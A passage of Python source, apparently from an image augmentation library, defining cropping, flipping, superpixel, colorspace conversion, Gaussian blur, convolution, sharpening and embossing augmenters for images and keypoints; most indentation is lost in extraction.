assert observed == expected, "Expected dim %d (entry index: %s) to have value %d, got %d." % (dimension, image_index, expected, observed)
elif isinstance(expected, tuple):
assert len(expected) == 2
assert expected[0] <= observed < expected[1], "Expected dim %d (entry index: %s) to have value in range [%d, %d), got %d." % (dimension, image_index, expected[0], expected[1], observed)
elif isinstance(expected, list):
assert any([observed == val for val in expected]), "Expected dim %d (entry index: %s) to have any value of %s, got %d." % (dimension, image_index, str(expected), observed)
else:
raise Exception("Invalid datatype for shape entry %d, expected each entry to be an integer, a tuple (with two entries) or a list, got %s." % (dimension, type(expected),))
def func_images(images, random_state, parents, hooks):
if check_images:
#assert is_np_array(images), "AssertShape can currently only handle numpy arrays, got "
if isinstance(images, list):
if shape[0] is not None:
compare(len(images), shape[0], 0, "ALL")
for i in sm.xrange(len(images)):
image = images[i]
assert len(image.shape) == 3, "Expected image number %d to have a shape of length 3, got %d (shape: %s)." % (i, len(image.shape), str(image.shape))
for j in sm.xrange(len(shape)-1):
expected = shape[j+1]
observed = image.shape[j]
compare(observed, expected, j, i)
else:
assert len(images.shape) == 4, "Expected image's shape to have length 4, got %d (shape: %s)." % (len(images.shape), str(images.shape))
for i in range(4):
expected = shape[i]
observed = images.shape[i]
compare(observed, expected, i, "ALL")
return images
def func_keypoints(keypoints_on_images, random_state, parents, hooks):
if check_keypoints:
#assert is_np_array(images), "AssertShape can currently only handle numpy arrays, got "
if shape[0] is not None:
compare(len(keypoints_on_images), shape[0], 0, "ALL")
for i in sm.xrange(len(keypoints_on_images)):
keypoints_on_image = keypoints_on_images[i]
for j in sm.xrange(len(shape[0:2])):
expected = shape[j+1]
observed = keypoints_on_image.shape[j]
compare(observed, expected, j, i)
return keypoints_on_images
if name is None:
name = "UnnamedAssertShape"
return Lambda(func_images, func_keypoints, name=name, deterministic=deterministic, random_state=random_state)
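# Usage sketch (illustrative): assert that every image is a 32x32 RGB image,
# accepting any batch size:
#   aug = AssertShape((None, 32, 32, 3))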
class Crop(Augmenter):
"""Crop Augmenter object that crops input image(s)
Parameters
----------
px : # TODO
percent : tuple, optional(default=None)
percent crop on each of the axis
keep_size : boolean, optional(default=True)
# TODO
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
every time
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, px=None, percent=None, keep_size=True, name=None, deterministic=False, random_state=None):
super(Crop, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
self.keep_size = keep_size
self.all_sides = None
self.top = None
self.right = None
self.bottom = None
self.left = None
if px is None and percent is None:
self.mode = "noop"
elif px is not None and percent is not None:
raise Exception("Can only crop by pixels or percent, not both.")
elif px is not None:
self.mode = "px"
if ia.is_single_integer(px):
assert px >= 0
#self.top = self.right = self.bottom = self.left = Deterministic(px)
self.all_sides = Deterministic(px)
elif isinstance(px, tuple):
assert len(px) in [2, 4]
def handle_param(p):
if ia.is_single_integer(p):
assert p >= 0
return Deterministic(p)
elif isinstance(p, tuple):
assert len(p) == 2
assert ia.is_single_integer(p[0])
assert ia.is_single_integer(p[1])
assert p[0] >= 0
assert p[1] >= 0
return DiscreteUniform(p[0], p[1])
elif isinstance(p, list):
assert len(p) > 0
assert all([ia.is_single_integer(val) for val in p])
assert all([val >= 0 for val in p])
return Choice(p)
elif isinstance(p, StochasticParameter):
return p
else:
raise Exception("Expected int, tuple of two ints, list of ints or StochasticParameter, got type %s." % (type(p),))
if len(px) == 2:
#self.top = self.right = self.bottom = self.left = handle_param(px)
self.all_sides = handle_param(px)
else: # len == 4
self.top = handle_param(px[0])
self.right = handle_param(px[1])
self.bottom = handle_param(px[2])
self.left = handle_param(px[3])
elif isinstance(px, StochasticParameter):
self.top = self.right = self.bottom = self.left = px
else:
raise Exception("Expected int, tuple of 4 ints/lists/StochasticParameters or StochasticParameter, git type %s." % (type(px),))
else: # = elif percent is not None:
self.mode = "percent"
if ia.is_single_number(percent):
assert 0 <= percent < 1.0
#self.top = self.right = self.bottom = self.left = Deterministic(percent)
self.all_sides = Deterministic(percent)
elif isinstance(percent, tuple):
assert len(percent) in [2, 4]
def handle_param(p):
if ia.is_single_number(p):
return Deterministic(p)
elif isinstance(p, tuple):
assert len(p) == 2
assert ia.is_single_number(p[0])
assert ia.is_single_number(p[1])
assert 0 <= p[0] < 1.0
assert 0 <= p[1] < 1.0
return Uniform(p[0], p[1])
elif isinstance(p, list):
assert len(p) > 0
assert all([ia.is_single_number(val) for val in p])
assert all([0 <= val < 1.0 for val in p])
return Choice(p)
elif isinstance(p, StochasticParameter):
return p
else:
raise Exception("Expected int, tuple of two ints, list of ints or StochasticParameter, got type %s." % (type(p),))
if len(percent) == 2:
#self.top = self.right = self.bottom = self.left = handle_param(percent)
self.all_sides = handle_param(percent)
else: # len == 4
self.top = handle_param(percent[0])
self.right = handle_param(percent[1])
self.bottom = handle_param(percent[2])
self.left = handle_param(percent[3])
elif isinstance(percent, StochasticParameter):
self.top = self.right = self.bottom = self.left = percent
else:
raise Exception("Expected number, tuple of 4 numbers/lists/StochasticParameters or StochasticParameter, got type %s." % (type(percent),))
def _augment_images(self, images, random_state, parents, hooks):
result = []
nb_images = len(images)
seeds = random_state.randint(0, 10**6, (nb_images,))
for i in sm.xrange(nb_images):
seed = seeds[i]
height, width = images[i].shape[0:2]
top, right, bottom, left = self._draw_samples_image(seed, height, width)
image_cropped = images[i][top:height-bottom, left:width-right, :]
if self.keep_size:
image_cropped = ia.imresize_single_image(image_cropped, (height, width))
result.append(image_cropped)
if not isinstance(images, list):
if self.keep_size:
result = np.array(result, dtype=np.uint8)
return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
result = []
nb_images = len(keypoints_on_images)
seeds = random_state.randint(0, 10**6, (nb_images,))
for i, keypoints_on_image in enumerate(keypoints_on_images):
seed = seeds[i]
height, width = keypoints_on_image.shape[0:2]
top, right, bottom, left = self._draw_samples_image(seed, height, width)
shifted = keypoints_on_image.shift(x=-left, y=-top)
shifted.shape = (height - top - bottom, width - left - right)
if self.keep_size:
result.append(shifted.on(keypoints_on_image.shape))
else:
result.append(shifted)
return result
def _draw_samples_image(self, seed, height, width):
random_state = ia.new_random_state(seed)
if self.all_sides is not None:
samples = self.all_sides.draw_samples((4,), random_state=random_state)
top, right, bottom, left = samples
else:
rs_top = random_state
rs_right = rs_top
rs_bottom = rs_top
rs_left = rs_top
top = self.top.draw_sample(random_state=rs_top)
right = self.right.draw_sample(random_state=rs_right)
bottom = self.bottom.draw_sample(random_state=rs_bottom)
left = self.left.draw_sample(random_state=rs_left)
if self.mode == "px":
# no change necessary for pixel values
pass
elif self.mode == "percent":
# percentage values have to be transformed to pixel values
top = int(height * top)
right = int(width * right)
bottom = int(height * bottom)
left = int(width * left)
else:
raise Exception("Invalid mode")
remaining_height = height - (top + bottom)
remaining_width = width - (left + right)
if remaining_height < 1:
regain = abs(remaining_height) + 1
regain_top = regain // 2
regain_bottom = regain // 2
if regain_top + regain_bottom < regain:
regain_top += 1
if regain_top > top:
diff = regain_top - top
regain_top = top
regain_bottom += diff
elif regain_bottom > bottom:
diff = regain_bottom - bottom
regain_bottom = bottom
regain_top += diff
assert regain_top <= top
assert regain_bottom <= bottom
top = top - regain_top
bottom = bottom - regain_bottom
if remaining_width < 1:
regain = abs(remaining_width) + 1
regain_right = regain // 2
regain_left = regain // 2
if regain_right + regain_left < regain:
regain_right += 1
if regain_right > right:
diff = regain_right - right
regain_right = right
regain_left += diff
elif regain_left > left:
diff = regain_left - left
regain_left = left
regain_right += diff
assert regain_right <= right
assert regain_left <= left
right = right - regain_right
left = left - regain_left
assert top >= 0 and right >= 0 and bottom >= 0 and left >= 0
assert top + bottom < height
assert right + left < width
return top, right, bottom, left
def get_parameters(self):
return [self.top, self.right, self.bottom, self.left]
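# Usage sketch (illustrative):
#   aug = Crop(px=(0, 16))                         # crop 0-16px from each side
#   aug = Crop(percent=(0, 0.1), keep_size=False)  # crop 0-10% from each side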
class Fliplr(Augmenter):
"""Flip the input images horizontally
Parameters
----------
p : int, float or StochasticParameter
probability of each image being flipped horizontally
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
every time
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, p=0, name=None, deterministic=False, random_state=None):
super(Fliplr, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_number(p):
self.p = Binomial(p)
elif isinstance(p, StochasticParameter):
self.p = p
else:
raise Exception("Expected p to be int or float or StochasticParameter, got %s." % (type(p),))
def _augment_images(self, images, random_state, parents, hooks):
nb_images = len(images)
samples = self.p.draw_samples((nb_images,), random_state=random_state)
for i in sm.xrange(nb_images):
if samples[i] == 1:
images[i] = np.fliplr(images[i])
return images
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
nb_images = len(keypoints_on_images)
samples = self.p.draw_samples((nb_images,), random_state=random_state)
for i, keypoints_on_image in enumerate(keypoints_on_images):
if samples[i] == 1:
width = keypoints_on_image.shape[1]
for keypoint in keypoints_on_image.keypoints:
keypoint.x = (width - 1) - keypoint.x
return keypoints_on_images
def get_parameters(self):
return [self.p]
class Flipud(Augmenter):
"""Flip the input images vertically
Parameters
----------
p : int, float or StochasticParameter
probability of each image being flipped vertically
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
every time
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, p=0, name=None, deterministic=False, random_state=None):
super(Flipud, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_number(p):
self.p = Binomial(p)
elif isinstance(p, StochasticParameter):
self.p = p
else:
raise Exception("Expected p to be int or float or StochasticParameter, got %s." % (type(p),))
def _augment_images(self, images, random_state, parents, hooks):
nb_images = len(images)
samples = self.p.draw_samples((nb_images,), random_state=random_state)
for i in sm.xrange(nb_images):
if samples[i] == 1:
images[i] = np.flipud(images[i])
return images
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
nb_images = len(keypoints_on_images)
samples = self.p.draw_samples((nb_images,), random_state=random_state)
for i, keypoints_on_image in enumerate(keypoints_on_images):
if samples[i] == 1:
height = keypoints_on_image.shape[0]
for keypoint in keypoints_on_image.keypoints:
keypoint.y = (height - 1) - keypoint.y
return keypoints_on_images
def get_parameters(self):
return [self.p]
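# Usage sketch (illustrative):
#   aug = Fliplr(0.5)  # mirror 50% of all images horizontally
#   aug = Flipud(0.2)  # flip 20% of all images vertically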
# TODO tests
class Superpixels(Augmenter):
"""Transform images to their superpixel representation.
This implementation uses skimage's version of the SLIC algorithm.
Parameters
----------
p_replace : int/float, tuple/list of ints/floats or StochasticParameter, optional (default=0)
Defines the probability of any superpixel area being replaced by the
superpixel, i.e. by the average pixel color within its area.
A probability of 0 means that no superpixel area is replaced by its
average (the image is not changed at all).
A probability of 0.5 means that half of all superpixels are replaced
by their average color.
A probability of 1.0 means that all superpixels are replaced by their
average color (resulting in a standard superpixel image).
This parameter can be a tuple (a, b), e.g. (0.5, 1.0). In this case,
a random probability p with a <= p <= b will be rolled per image.
n_segments : int, tuple/list of ints, StochasticParameter, optional (default=100)
Number of superpixels to generate.
max_size : int, None, optional (default=128)
Maximum image size at which the superpixels are generated.
If the width or height of an image exceeds this value, it will be
downscaled so that the longest side matches max_size.
This is done to speed up the superpixel algorithm.
Use None to apply no downscaling.
interpolation : int, string (default="linear")
Interpolation method to use during downscaling when max_size is
exceeded. Valid methods are the same as in ia.imresize_single_image().
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
every time
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, p_replace=0, n_segments=100, max_size=128, interpolation="linear", name=None, deterministic=False, random_state=None):
super(Superpixels, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_number(p_replace):
self.p_replace = Binomial(p_replace)
elif ia.is_iterable(p_replace):
assert len(p_replace) == 2
assert p_replace[0] < p_replace[1]
assert 0 <= p_replace[0] <= 1.0
assert 0 <= p_replace[1] <= 1.0
self.p_replace = Binomial(Uniform(p_replace[0], p_replace[1]))
elif isinstance(p_replace, StochasticParameter):
self.p_replace = p_replace
else:
raise Exception("Expected p_replace to be float, int, list/tuple of floats/ints or StochasticParameter, got %s." % (type(p_replace),))
if ia.is_single_integer(n_segments):
self.n_segments = Deterministic(n_segments)
elif ia.is_iterable(n_segments):
assert len(n_segments) == 2, "Expected tuple/list with 2 entries, got %d entries." % (len(n_segments),)
self.n_segments = DiscreteUniform(n_segments[0], n_segments[1])
elif isinstance(n_segments, StochasticParameter):
self.n_segments = n_segments
else:
raise Exception("Expected int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(n_segments),))
self.max_size = max_size
self.interpolation = interpolation
def _augment_images(self, images, random_state, parents, hooks):
#import time
nb_images = len(images)
#p_replace_samples = self.p_replace.draw_samples((nb_images,), random_state=random_state)
n_segments_samples = self.n_segments.draw_samples((nb_images,), random_state=random_state)
seeds = random_state.randint(0, 10**6, size=(nb_images,))
for i in sm.xrange(nb_images):
#replace_samples = ia.new_random_state(seeds[i]).binomial(1, p_replace_samples[i], size=(n_segments_samples[i],))
replace_samples = self.p_replace.draw_samples((n_segments_samples[i],), random_state=ia.new_random_state(seeds[i]))
#print("n_segments", n_segments_samples[i], "replace_samples.shape", replace_samples.shape)
#print("p", p_replace_samples[i])
#print("replace_samples", replace_samples)
if np.max(replace_samples) == 0:
# not a single superpixel would be replaced by its average color,
# i.e. the image would not be changed, so just keep it
pass
else:
image = images[i]
orig_shape = image.shape
if self.max_size is not None:
size = max(image.shape[0], image.shape[1])
if size > self.max_size:
resize_factor = self.max_size / size
new_height, new_width = int(image.shape[0] * resize_factor), int(image.shape[1] * resize_factor)
image = ia.imresize_single_image(image, (new_height, new_width), interpolation=self.interpolation)
#image_sp = np.random.randint(0, 255, size=image.shape).astype(np.uint8)
image_sp = np.copy(image)
#time_start = time.time()
segments = segmentation.slic(image, n_segments=n_segments_samples[i], compactness=10)
#print("seg", np.min(segments), np.max(segments), n_segments_samples[i])
#print("segmented in %.4fs" % (time.time() - time_start))
#print(np.bincount(segments.flatten()))
#time_start = time.time()
nb_channels = image.shape[2]
for c in sm.xrange(nb_channels):
# segments+1 here because otherwise regionprops always misses
# the last label
regions = measure.regionprops(segments+1, intensity_image=image[..., c])
for ridx, region in enumerate(regions):
# with mod here, because slic can sometimes create more superpixel
# than requested. replace_samples then does not have enough
# values, so we just start over with the first one again.
if replace_samples[ridx % len(replace_samples)] == 1:
#print("changing region %d of %d, channel %d, #indices %d" % (ridx, np.max(segments), c, len(np.where(segments == ridx)[0])))
mean_intensity = region.mean_intensity
image_sp_c = image_sp[..., c]
image_sp_c[segments == ridx] = mean_intensity
#print("colored in %.4fs" % (time.time() - time_start))
if orig_shape != image.shape:
image_sp = ia.imresize_single_image(image_sp, orig_shape[0:2], interpolation=self.interpolation)
images[i] = image_sp
return images
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
return keypoints_on_images
def get_parameters(self):
return [self.n_segments, self.max_size]
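# Usage sketch (illustrative): replace about half of roughly 64 superpixels
# per image by their average color:
#   aug = Superpixels(p_replace=0.5, n_segments=64)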
# TODO tests
# Note: Not clear whether this class will be kept (for anything aside from grayscale)
# other colorspaces don't really make sense and they also might not work correctly
# due to having no clearly limited range (like 0-255 or 0-1)
class ChangeColorspace(Augmenter):
RGB = "RGB"
BGR = "BGR"
GRAY = "GRAY"
CIE = "CIE"
YCrCb = "YCrCb"
HSV = "HSV"
HLS = "HLS"
Lab = "Lab"
Luv = "Luv"
COLORSPACES = set([
RGB,
BGR,
GRAY,
CIE,
YCrCb,
HSV,
HLS,
Lab,
Luv
])
CV_VARS = {
# RGB
#"RGB2RGB": cv2.COLOR_RGB2RGB,
"RGB2BGR": cv2.COLOR_RGB2BGR,
"RGB2GRAY": cv2.COLOR_RGB2GRAY,
"RGB2CIE": cv2.COLOR_RGB2XYZ,
"RGB2YCrCb": cv2.COLOR_RGB2YCR_CB,
"RGB2HSV": cv2.COLOR_RGB2HSV,
"RGB2HLS": cv2.COLOR_RGB2HLS,
"RGB2LAB": cv2.COLOR_RGB2LAB,
"RGB2LUV": cv2.COLOR_RGB2LUV,
# BGR
"BGR2RGB": cv2.COLOR_BGR2RGB,
#"BGR2BGR": cv2.COLOR_BGR2BGR,
"BGR2GRAY": cv2.COLOR_BGR2GRAY,
"BGR2CIE": cv2.COLOR_BGR2XYZ,
"BGR2YCrCb": cv2.COLOR_BGR2YCR_CB,
"BGR2HSV": cv2.COLOR_BGR2HSV,
"BGR2HLS": cv2.COLOR_BGR2HLS,
"BGR2LAB": cv2.COLOR_BGR2LAB,
"BGR2LUV": cv2.COLOR_BGR2LUV,
# HSV
"HSV2RGB": cv2.COLOR_HSV2RGB,
"HSV2BGR": cv2.COLOR_HSV2BGR,
}
def __init__(self, to_colorspace, alpha, from_colorspace="RGB", name=None, deterministic=False, random_state=None):
super(ChangeColorspace, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_number(alpha):
self.alpha = Deterministic(alpha)
elif ia.is_iterable(alpha):
assert len(alpha) == 2, "Expected tuple/list with 2 entries, got %d entries." % (len(alpha),)
self.alpha = Uniform(alpha[0], alpha[1])
elif isinstance(alpha, StochasticParameter):
self.alpha = alpha
else:
raise Exception("Expected alpha to be int or float or tuple/list of ints/floats or StochasticParameter, got %s." % (type(alpha),))
if ia.is_string(to_colorspace):
assert to_colorspace in ChangeColorspace.COLORSPACES
self.to_colorspace = Deterministic(to_colorspace)
elif ia.is_iterable(to_colorspace):
assert all([ia.is_string(colorspace) for colorspace in to_colorspace])
assert all([(colorspace in ChangeColorspace.COLORSPACES) for colorspace in to_colorspace])
self.to_colorspace = Choice(to_colorspace)
elif isinstance(to_colorspace, StochasticParameter):
self.to_colorspace = to_colorspace
else:
raise Exception("Expected to_colorspace to be string, list of strings or StochasticParameter, got %s." % (type(to_colorspace),))
self.from_colorspace = from_colorspace
assert self.from_colorspace in ChangeColorspace.COLORSPACES
assert from_colorspace != ChangeColorspace.GRAY
def _augment_images(self, images, random_state, parents, hooks):
result = images
nb_images = len(images)
alphas = self.alpha.draw_samples((nb_images,), random_state=ia.copy_random_state(random_state))
to_colorspaces = self.to_colorspace.draw_samples((nb_images,), random_state=ia.copy_random_state(random_state))
for i in sm.xrange(nb_images):
alpha = alphas[i]
to_colorspace = to_colorspaces[i]
image = images[i]
assert 0.0 <= alpha <= 1.0
assert to_colorspace in ChangeColorspace.COLORSPACES
if alpha == 0 or self.from_colorspace == to_colorspace:
pass # no change necessary
else:
# some colorspaces here should use image/255.0 according to the docs,
# but at least for conversion to grayscale that results in errors,
# ie uint8 is expected
if self.from_colorspace in [ChangeColorspace.RGB, ChangeColorspace.BGR]:
from_to_var_name = "%s2%s" % (self.from_colorspace, to_colorspace)
from_to_var = ChangeColorspace.CV_VARS[from_to_var_name]
img_to_cs = cv2.cvtColor(image, from_to_var)
else:
# convert to RGB
from_to_var_name = "%s2%s" % (self.from_colorspace, ChangeColorspace.RGB)
from_to_var = ChangeColorspace.CV_VARS[from_to_var_name]
img_rgb = cv2.cvtColor(image, from_to_var)
if to_colorspace == ChangeColorspace.RGB:
img_to_cs = img_rgb
else:
# convert from RGB to desired target colorspace
from_to_var_name = "%s2%s" % (ChangeColorspace.RGB, to_colorspace)
from_to_var = ChangeColorspace.CV_VARS[from_to_var_name]
img_to_cs = cv2.cvtColor(img_rgb, from_to_var)
# this will break colorspaces that have values outside 0-255 or 0.0-1.0
if ia.is_integer_array(img_to_cs):
img_to_cs = np.clip(img_to_cs, 0, 255).astype(np.uint8)
else:
img_to_cs = np.clip(img_to_cs * 255, 0, 255).astype(np.uint8)
if len(img_to_cs.shape) == 2:
img_to_cs = img_to_cs[:, :, np.newaxis]
img_to_cs = np.tile(img_to_cs, (1, 1, 3))
if alpha == 1:
result[i] = img_to_cs
else:
result[i] = (alpha * img_to_cs + (1 - alpha) * image).astype(np.uint8)
        return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
return keypoints_on_images
def get_parameters(self):
return [self.alpha, self.to_colorspace]
# TODO tests
def Grayscale(alpha=0, from_colorspace="RGB", name=None, deterministic=False, random_state=None):
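    """Creates an augmenter that converts images to their grayscale versions.
    This is a thin wrapper around ChangeColorspace with to_colorspace=GRAY.
    Example (a minimal usage sketch; assumes `image` is a (H, W, C) uint8 numpy array):
        aug = Grayscale(alpha=(0.0, 1.0))
        image_aug = aug.augment_image(image)
    """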
return ChangeColorspace(to_colorspace=ChangeColorspace.GRAY, alpha=alpha, from_colorspace=from_colorspace, name=name, deterministic=deterministic, random_state=random_state)
class GaussianBlur(Augmenter):
"""Apply GaussianBlur to input images
Parameters
----------
sigma : float, list/iterable of length 2 of floats or StochasticParameter
variance parameter.
name : string, optional(default=None)
name of the instance
    deterministic : boolean, optional (default=False)
        Whether to save the random state before augmenting images and reset
        it to the saved value afterwards. Use this parameter to obtain the
        exact same sequence of transformations every time.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
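    Example (a minimal usage sketch; assumes `image` is a (H, W, C) uint8 numpy array):
        aug = GaussianBlur(sigma=(0.5, 2.0))
        image_aug = aug.augment_image(image)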
"""
def __init__(self, sigma=0, name=None, deterministic=False, random_state=None):
super(GaussianBlur, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_number(sigma):
self.sigma = Deterministic(sigma)
elif ia.is_iterable(sigma):
            assert len(sigma) == 2, "Expected tuple/list with 2 entries, got %d entries." % (len(sigma),)
self.sigma = Uniform(sigma[0], sigma[1])
elif isinstance(sigma, StochasticParameter):
self.sigma = sigma
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(sigma),))
def _augment_images(self, images, random_state, parents, hooks):
result = images
nb_images = len(images)
samples = self.sigma.draw_samples((nb_images,), random_state=random_state)
for i in sm.xrange(nb_images):
nb_channels = images[i].shape[2]
sig = samples[i]
if sig > 0:
for channel in sm.xrange(nb_channels):
result[i][:, :, channel] = ndimage.gaussian_filter(result[i][:, :, channel], sig)
return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
return keypoints_on_images
def get_parameters(self):
return [self.sigma]
# TODO tests
class Convolve(Augmenter):
"""Apply a Convolution to input images.
Parameters
----------
matrix : None, 2D numpy array, StochasticParameter, function
The weight matrix of the convolution kernel to apply.
If None, a unit matrix will be used that does not change the image.
If a numpy array, that array will be used for all images and channels.
If a stochastic parameter, C new matrices will be generated
via param.draw_samples(C) for each image, where C is the number of
channels.
If a function, the parameter will be called for each image
via param(C, random_state). The function must return C matrices,
one per channel.
name : TODO
    deterministic : boolean, optional (default=False)
        Whether to save the random state before augmenting images and reset
        it to the saved value afterwards. Use this parameter to obtain the
        exact same sequence of transformations every time.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
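    Example (a minimal usage sketch; assumes `image` is a (H, W, C) uint8 numpy
    array and that numpy is imported as `np`, as elsewhere in this module):
        kernel = np.array([
            [0, -1, 0],
            [-1, 5, -1],
            [0, -1, 0]
        ], dtype=np.float32)  # a simple sharpening kernel
        aug = Convolve(matrix=kernel)
        image_aug = aug.augment_image(image)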
"""
def __init__(self, matrix=None, name=None, deterministic=False, random_state=None):
super(Convolve, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if matrix is None:
self.matrix = np.array([[1]], dtype=np.float32)
self.matrix_type = "constant"
elif ia.is_np_array(matrix):
            assert len(matrix.shape) == 2, "Expected convolution matrix to have exactly two axes, got %d (shape %s)." % (len(matrix.shape), matrix.shape)
self.matrix = matrix
self.matrix_type = "constant"
elif isinstance(matrix, StochasticParameter):
self.matrix = matrix
self.matrix_type = "stochastic"
elif isinstance(matrix, types.FunctionType):
self.matrix = matrix
self.matrix_type = "function"
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(sigma),))
def _augment_images(self, images, random_state, parents, hooks):
result = images
nb_images = len(images)
for i in sm.xrange(nb_images):
height, width, nb_channels = images[i].shape
if self.matrix_type == "constant":
matrices = [self.matrix] * nb_channels
elif self.matrix_type == "stochastic":
                matrices = self.matrix.draw_samples((nb_channels,), random_state=random_state)
elif self.matrix_type == "function":
matrices = self.matrix(nb_channels, random_state)
else:
raise Exception("Invalid matrix type")
            # filter in float32 to avoid uint8 overflow/truncation, then clip back;
            # cv2.filter2D is used instead of the slower ndimage.convolve
            image_aug = images[i].astype(np.float32)
            for channel in sm.xrange(nb_channels):
                image_aug[..., channel] = cv2.filter2D(image_aug[..., channel], -1, matrices[channel])
            result[i] = np.clip(image_aug, 0, 255).astype(np.uint8)
return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
# TODO this can fail for some matrices, e.g. [[0, 0, 1]]
return keypoints_on_images
def get_parameters(self):
return [self.matrix, self.matrix_type]
# TODO tests
"""Creates an augmenter that sharpens images.
Parameters
----------
alpha : int, float, tuple of two ints/floats or StochasticParameter
Visibility of the sharpened image. At 0, only the original image is visible,
at 1.0 only its sharpened version is visible.
strength : int, float, tuple of two ints/floats or StochasticParameter, optional
Parameter that controls the strength of the sharpening.
Sane values are somewhere in the range (0.5, 2).
The value 0 results in an edge map. Values higher than 1 create bright images.
Default value is 1.
name : TODO
deterministic : TODO
random_state : TODO
Example:
aug = Sharpen(alpha=(0.0, 1.0), strength=(0.75, 2.0))
image_aug = aug.augment_image(image)
"""
def Sharpen(alpha=0, strength=1, name=None, deterministic=False, random_state=None):
if ia.is_single_number(alpha):
alpha_param = Deterministic(alpha)
elif ia.is_iterable(alpha):
        assert len(alpha) == 2, "Expected tuple/list with 2 entries, got %d entries." % (len(alpha),)
alpha_param = Uniform(alpha[0], alpha[1])
elif isinstance(alpha, StochasticParameter):
alpha_param = alpha
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(alpha),))
if ia.is_single_number(strength):
strength_param = Deterministic(strength)
elif ia.is_iterable(strength):
        assert len(strength) == 2, "Expected tuple/list with 2 entries, got %d entries." % (len(strength),)
strength_param = Uniform(strength[0], strength[1])
elif isinstance(strength, StochasticParameter):
strength_param = strength
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(strength),))
def create_matrices(nb_channels, random_state_func):
alpha_sample = alpha_param.draw_sample(random_state=random_state_func)
assert 0 <= alpha_sample <= 1.0
strength_sample = strength_param.draw_sample(random_state=random_state_func)
matrix_nochange = np.array([
[0, 0, 0],
[0, 1, 0],
[0, 0, 0]
], dtype=np.float32)
matrix_effect = np.array([
[-1, -1, -1],
[-1, 8+strength_sample, -1],
[-1, -1, -1]
], dtype=np.float32)
matrix = (1-alpha_sample) * matrix_nochange + alpha_sample * matrix_effect
return [matrix] * nb_channels
return Convolve(create_matrices, name=name, deterministic=deterministic, random_state=random_state)
# TODO tests
"""Creates an augmenter that embosses an image.
The embossed version pronounces highlights and shadows,
letting the image look as if it was recreated on a metal plate ("embossed").
Parameters
----------
alpha : int, float, tuple of two ints/floats or StochasticParameter
Visibility of the embossed image. At 0, only the original image is visible,
at 1.0 only the embossed image is visible.
strength : int, float, tuple of two ints/floats or StochasticParameter, optional
Parameter that controls the strength of the embossing.
Sane values are somewhere in the range (0, 2) with 1 being the standard
embossing effect. Default value is 1.
name : TODO
deterministic : TODO
random_state : TODO
Example:
aug = Emboss(alpha=(0.0, 1.0), strength=(0.5, 1.5))
image_aug = aug.augment_image(image)
"""
def Emboss(alpha=0, strength=1, name=None, deterministic=False, random_state=None):
if ia.is_single_number(alpha):
alpha_param = Deterministic(alpha)
elif ia.is_iterable(alpha):
        assert len(alpha) == 2, "Expected tuple/list with 2 entries, got %d entries." % (len(alpha),)
alpha_param = Uniform(alpha[0], alpha[1])
elif isinstance(alpha, StochasticParameter):
alpha_param = alpha
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(alpha),))
if ia.is_single_number(strength):
strength_param = Deterministic(strength)
elif ia.is_iterable(strength):
        assert len(strength) == 2, "Expected tuple/list with 2 entries, got %d entries." % (len(strength),)
strength_param = Uniform(strength[0], strength[1])
elif isinstance(strength, StochasticParameter):
strength_param = strength
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(strength),))
def create_matrices(nb_channels, random_state_func):
alpha_sample = alpha_param.draw_sample(random_state=random_state_func)
assert 0 <= alpha_sample <= 1.0
strength_sample = strength_param.draw_sample(random_state=random_state_func)
matrix_nochange = np.array([
[0, 0, 0],
[0, 1, 0],
[0, 0, 0]
], dtype=np.float32)
